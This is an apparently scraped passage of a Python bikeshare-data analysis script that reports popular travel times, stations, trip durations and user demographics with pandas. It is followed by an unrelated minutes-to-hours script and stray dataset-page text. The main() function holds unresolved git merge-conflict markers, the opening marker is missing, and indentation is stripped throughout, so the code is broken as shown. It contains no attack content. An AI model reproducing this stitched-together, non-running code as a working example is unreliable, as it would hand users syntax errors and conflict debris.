popular_day = df['day'].mode()[0]
print('Most common day:\n{} \n'.format(popular_day))
# TO DO: display the most common start hour
df['hour']= df['Start Time'].dt.hour
popular_hour = df['hour'].mode()[0]
print('Most common start hour:\n{} \n'.format(popular_hour))
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def station_stats(df):
"""Displays statistics on the most popular stations and trip."""
print('\nCalculating The Most Popular Stations and Trip...\n')
start_time = time.time()
# TO DO: display most commonly used start station
popular_s_station = df['Start Station'].mode()[0]
print('Most commonly used start station:\n{} \n'.format(popular_s_station))
# TO DO: display most commonly used end station
popular_e_station = df['End Station'].mode()[0]
print('Most commonly used end station:\n{} \n'.format(popular_e_station))
# TO DO: display most frequent combination of start station and end station trip
df['combination']= df['Start Station'] + " - To - " + df['End Station']
popular_trip = df['combination'].mode()[0]
print('Most common frequent combination of start station and end station trip:\n{} \n'.format(popular_trip))
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def trip_duration_stats(df):
"""Displays statistics on the total and average trip duration."""
print('\nCalculating Trip Duration...\n')
start_time = time.time()
# TO DO: display total travel time
Total_trip_duration= df['Trip Duration'].sum()
print('Total travel time:\n{} \n'.format(Total_trip_duration))
# TO DO: display mean travel time
Mean_trip_duration= df['Trip Duration'].mean()
print('Mean travel time:\n{} \n'.format(Mean_trip_duration))
Total_count_of_Trips= df['Trip Duration'].count()
print('Number of trips:\n{} \n'.format(Total_count_of_Trips))
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def user_stats(df):
"""Displays statistics on bikeshare users."""
print('\nCalculating User Stats...\n')
start_time = time.time()
# TO DO: Display counts of user types
print('\nCounts of user types:\nSubscriber')
print(df['User Type'].value_counts()['Subscriber'])
print('\nCustomer:')
print(df['User Type'].value_counts()['Customer'])
print('\nCounts of gender:\n')
print('Male:')
print(df['Gender'].value_counts()['Male'])
print('\nFemale:')
print(df['Gender'].value_counts()['Female'])
# TO DO: Display earliest, most recent, and most common year of birth
print('Oldest year of birth : ' , df['Birth Year'].min())
print('\nNewest year of birth : ' ,df['Birth Year'].max())
print('\nMost common year of birth : ', df['Birth Year'].mode()[0])
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def main():
while True:
city, month, day = get_filters()
df = load_data(city, month, day)
print('-'*40)
print('the data is ready to be viewed')
print('-'*40)
user_raw_data= input("Do you want to see raw data (5 rows)? Enter : yes or no.\n").lower()
||||||| merged common ancestors
user_raw_data= input("Do you want to see raw data? Enter : yes or no.\n").lower()
=======
print('-'*40)
print('the data is ready to be viewed')
print('-'*40)
user_raw_data= input("Do you want to see raw data (5 rows)? Enter : yes or no.\n").lower()
>>>>>>> refactoring
start = 0
end = 5
while(user_raw_data == "yes"):
print(df.iloc[start:end])
start += 5
end += 5
user_raw_data= input("Do you still want to see more raw data (5 rows)? Enter : yes or no.\n").lower()
||||||| merged common ancestors
user_raw_data= input("Do you still want to see more raw data? Enter : yes or no.\n").lower()
=======
user_raw_data= input("Do you still want to see more raw data (5 rows)? Enter : yes or no.\n").lower()
>>>>>>> refactoring
time_stats(df)
station_stats(df)
trip_duration_stats(df)
user_stats(df)
restart = input('\nWould you like to restart? Enter yes or no.\n')
if restart.lower() != 'yes':
break
if __name__ == "__main__":
main()
|
#!/usr/bin/env python3
import sys
def Hours():
try:
num = int (sys.argv[1])
if num < 0 :
raise ValueError ('ValueError? Input number cannot be negative')
h, m = divmod(num, 60)
print ("{} H, {} M".format(h, m))
except ValueError:
print ('ValueError? Input number cannot be negative')
Hours()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.